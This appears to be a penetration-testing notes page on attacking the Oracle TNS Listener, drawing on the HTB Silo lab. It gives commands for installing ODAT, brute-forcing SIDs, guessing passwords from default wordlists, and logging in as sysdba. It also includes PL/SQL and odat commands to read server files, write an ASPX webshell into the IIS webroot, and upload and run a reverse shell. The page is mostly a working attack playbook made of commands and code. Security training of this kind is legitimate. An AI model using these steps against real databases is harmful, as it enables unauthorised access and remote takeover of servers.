Oracle TNS Listener

Reference

Hacktricks
HTB: Silo

Setting up ODAT

git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
sudo apt-get install libaio1 python3-dev alien python3-pip

Get instant client Basic, SDK (devel) and Sqlplus from the Oracle web site:
X64: http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html
- Download :
X86: http://www.oracle.com/technetwork/topics/linuxsoft-082809.html

sudo alien --to-deb *.rpm
sudo dpkg -i *.deb

#Add this to /etc/profile 
#To add ORACLE_HOME path. There are 2 directories. Add the 19.x directory to path 
#ls /usr/lib/oracle 
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/  
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

pip install cx_Oracle
pip install pycryptodome==3.4.3
pip install passlib
pip install python-libnmap

Enumeration

#Enumerate SID [Oracle System ID for DB / String used to uniquely identify a particular database on a system.]
python3 odat.py sidguesser -s <IP> -p 1521
use auxiliary/scanner/oracle/sid_brute

#Check TNS_Listener poisoning
use auxiliary/scanner/oracle/tnspoison_checker

#Identify valid accounts with ODAT
#Wordlist: /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt
cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt ./accounts/accounts.txt
#Change the formatting to match <user/pass> using SED formatting:
%s/ /\//g

python3 odat.py passwordguesser -s <IP> -d <SID>

##Connect to DB with valid credentials
sqlplus64 scott/tiger@10.10.10.82/<SID> as sysdba

#List session privileges
select * from session_privs;

#List role privileges
select * from user_role_privs;

Exploitation

Requires Valid Credentials

Check Read Access

When writing a file to server within login shell, Hit / to execute.

sqlplus64 scott/tiger@10.10.10.82/XE as sysdba
set serveroutput ON

#Run stored procedure. Hit `/` to execute.
declare
    f utl_file.file_type;
    s varchar(200);
begin
    f :=utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm','R');
    utl_file.get_line(f,s);
    utl_file.fclose(f);
    dbms_output.put_line(s);
end;

Webshell

Web shell runs with IIS service privileges.
Upload webshell to webroot and access via web server.

#Automate using odat
#Set up an ASPX reverse shell & listener
python odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot\\" <name-on-target>.aspx <path-to-shell-local> --sysdba

-----------
#Manual upload webshell. Remove extra lines/comments. Line count needs to be <1000 for Oracle to execute
cp /usr/share/webshells/aspx/cmdasp.aspx shell.aspx
sed -z 's/\n//g' shell.aspx

#Save the below stored procedure.
declare
    f utl_file.file_type;
    s varchar(5000) := '<Replace with .aspx webshell code>';
begin
    f :=utl_file.fopen('/inetpub/wwwroot', 'cmd.aspx','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;

Reverse Shell

May be unstable
Runs with Oracle service privileges

#Set up reverse shell and listener
python odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /<Target-location> <uploadedshell.exe> <path-to-shell-local --sysdba
./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec </temp: Target-location> <uploadedshell.exe>
----------------------------

#Manual upload

declare
    f utl_file.file_type;
    s varchar(5000) := '<Replace with shellcode>';
begin
    f :=utl_file.fopen('/inetpub/wwwroot', 'revshell.exe','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;

PreviousDatabase Services NextMySQL

Last updated 2 years ago